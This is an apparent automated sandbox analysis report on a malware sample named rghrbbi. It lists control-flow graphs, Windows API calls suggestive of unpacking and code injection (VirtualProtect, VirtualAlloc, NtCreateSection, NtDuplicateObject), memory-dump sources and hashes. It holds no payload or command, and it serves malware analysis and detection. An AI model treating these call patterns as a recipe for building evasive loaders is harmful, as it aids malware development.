                                                              • Instruction ID: b8fad2149ce1c72ead298f70c1fe5a9f46f924ad6fd9cff4a247a45f8ac33ccc
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: 51527974A05229DFDB64CF68C994BACBBB1BF09304F1484D9E94DAB351DB30AA94CF14

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 388 415440-415580 GetModuleHandleW GetProcAddress VirtualProtect
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(02B17CE0), ref: 0041551F
                                                              • GetProcAddress.KERNEL32(00000000,00419CC8), ref: 0041555C
                                                              • VirtualProtect.KERNELBASE(02B17B24,02B17CDC,00000040,?), ref: 0041557B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-3916222277
                                                              • Opcode ID: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
                                                              • Instruction ID: e4fb223d50131012075ae1e13ab3c59e5b4ef3b604d21eb0d0e12d9e3e0b2718
                                                              • Opcode Fuzzy Hash: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
                                                              • Instruction Fuzzy Hash: C0312310958380CAF301CB78F8147927FE2BB25744F449479D188873A5EFBA5924D7EE

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 426 2d2a793-2d2a7ac 427 2d2a7ae-2d2a7b0 426->427 428 2d2a7b2 427->428 429 2d2a7b7-2d2a7c3 CreateToolhelp32Snapshot 427->429 428->429 430 2d2a7d3-2d2a7e0 Module32First 429->430 431 2d2a7c5-2d2a7cb 429->431 432 2d2a7e2-2d2a7e3 call 2d2a452 430->432 433 2d2a7e9-2d2a7f1 430->433 431->430 438 2d2a7cd-2d2a7d1 431->438 436 2d2a7e8 432->436 436->433 438->427 438->430
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D2A7BB
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02D2A7DB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D27000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2d27000_rghrbbi.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: 56c2e47a822ad6e335ffbe326bf5532b0a11e6f3cb6bc91cb98f9ea70f9e9f2f
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 92F096365007216FD7203BF99C8CB6FB6FCEF59628F100569E646925C0DB70EC498A65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 439 2ba0e0f-2ba0e24 SetErrorMode * 2 440 2ba0e2b-2ba0e2c 439->440 441 2ba0e26 439->441 441->440
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02BA0223,?,?), ref: 02BA0E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02BA0223,?,?), ref: 02BA0E1E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2ba0000_rghrbbi.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: 6caa47b8ee7731fb4f42fe3c73b0a19dde9cf11d5998d059322002e2c43fd413
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: AFD0123154512877DB003A94DC09BCD7B1CDF09B66F008451FB0DD9080C770954046E5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 442 4019c0-4019c6 443 4019e7-401a10 442->443 444 4019c8-4019dd call 40127e 442->444 452 401a13-401a46 call 40127e Sleep call 4014fb 443->452 453 401a09-401a0c 443->453 461 401a55-401a5b 452->461 462 401a48-401a50 call 4015fb 452->462 453->452 465 401a60-401a65 461->465 466 401a69 461->466 462->461 467 401a6c-401a9a call 40127e 465->467 466->465 466->467
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                              • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                              • Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                              • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 476 4019e0-401a10 482 401a13-401a46 call 40127e Sleep call 4014fb 476->482 483 401a09-401a0c 476->483 491 401a55-401a5b 482->491 492 401a48-401a50 call 4015fb 482->492 483->482 495 401a60-401a65 491->495 496 401a69 491->496 492->491 497 401a6c-401a9a call 40127e 495->497 496->495 496->497
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                              • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                              • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                              • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                              • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                              • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                              • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                              • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                              • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                              • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                              • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                              • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                              • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D2A4A3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D27000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2d27000_rghrbbi.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 9adb32bb95d37c20f11215107135b8cff17ddd0d51fc42dfab454d9c2e697454
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 6F112D79A00208EFDB01DF98C985E98BBF5EF08751F058095F9489B361D371EA50EF90
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                              • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                              • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                              • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                              • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                              • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                              • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
                                                              APIs
                                                              • LocalAlloc.KERNELBASE(00000000,02B17CDC,00415A8D), ref: 00415418
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: AllocLocal
                                                              • String ID:
                                                              • API String ID: 3494564517-0
                                                              • Opcode ID: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
                                                              • Instruction ID: 6131ea327b8c01d7d03da24dd51081d073e1987c8407c645eead08220222526f
                                                              • Opcode Fuzzy Hash: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
                                                              • Instruction Fuzzy Hash: 36B092B09822009FE200CB50E804B117BA8A308242F404450F505C3140DF205810AA14
                                                              APIs
                                                              • BuildCommDCBA.KERNEL32(00000000,?), ref: 0041563D
                                                              • WritePrivateProfileStringA.KERNEL32(00417380,0041734C,00417328,00417314), ref: 00415661
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415669
                                                              • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004156B1
                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 004156C0
                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004156D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: BuildCalendarCommEnvironmentFreeInfoNameObjectOpenPathPrivateProfileShortStringStringsWrite
                                                              • String ID: -
                                                              • API String ID: 1791614364-2547889144
                                                              • Opcode ID: 88fe81dbf2d2a4479fbbfd614abe983f9694fc7ccc8258a604b0f67acac7be9b
                                                              • Instruction ID: 327a1d9486ecdfb24dc002fa9ea073514ce32c0532a3afa617439fefb1992a41
                                                              • Opcode Fuzzy Hash: 88fe81dbf2d2a4479fbbfd614abe983f9694fc7ccc8258a604b0f67acac7be9b
                                                              • Instruction Fuzzy Hash: 7E210830A84304EBD7509F54DC46FD97BB4EB48711F9280A5FA4DAA1C0CE7859C49BDD
                                                              APIs
                                                              • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004156B1
                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 004156C0
                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004156D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: CalendarInfoNameObjectOpenPathShort
                                                              • String ID: -
                                                              • API String ID: 2381848886-2547889144
                                                              • Opcode ID: 466851c8a0054e7edbf17a091432d8a9fee8f66fccbcc732fb0e0e7a252ed25a
                                                              • Instruction ID: 7e98e6f74bb160639cfe8ebb3c1cacb5dac1db98f22b652a1399afec41121bf8
                                                              • Opcode Fuzzy Hash: 466851c8a0054e7edbf17a091432d8a9fee8f66fccbcc732fb0e0e7a252ed25a
                                                              • Instruction Fuzzy Hash: 2601F431A84344DADB708F509C82BD97BA4FB48325F924199FA8C6F1C0CEB519C4DBC9
                                                              APIs
                                                              • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415744
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041575F
                                                              • HeapDestroy.KERNEL32(00000000), ref: 0041577E
                                                              • GetNumaProcessorNode.KERNEL32(00000000,00000000), ref: 00415788
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                              • String ID:
                                                              • API String ID: 4159173863-0
                                                              • Opcode ID: a7acaef5ee7e24d6bb35c7ac29c9eac0636e6f05b45e14591ab1bbd8ad3298a8
                                                              • Instruction ID: 75f5f447a75e1158ec7b8286dcbe49327f873da7596033eeb3f7384675a4dd99
                                                              • Opcode Fuzzy Hash: a7acaef5ee7e24d6bb35c7ac29c9eac0636e6f05b45e14591ab1bbd8ad3298a8
                                                              • Instruction Fuzzy Hash: C301A771A80108DFE750EBA4EC86BDA77A8A70C346F814036F605D72C0EF7459448B99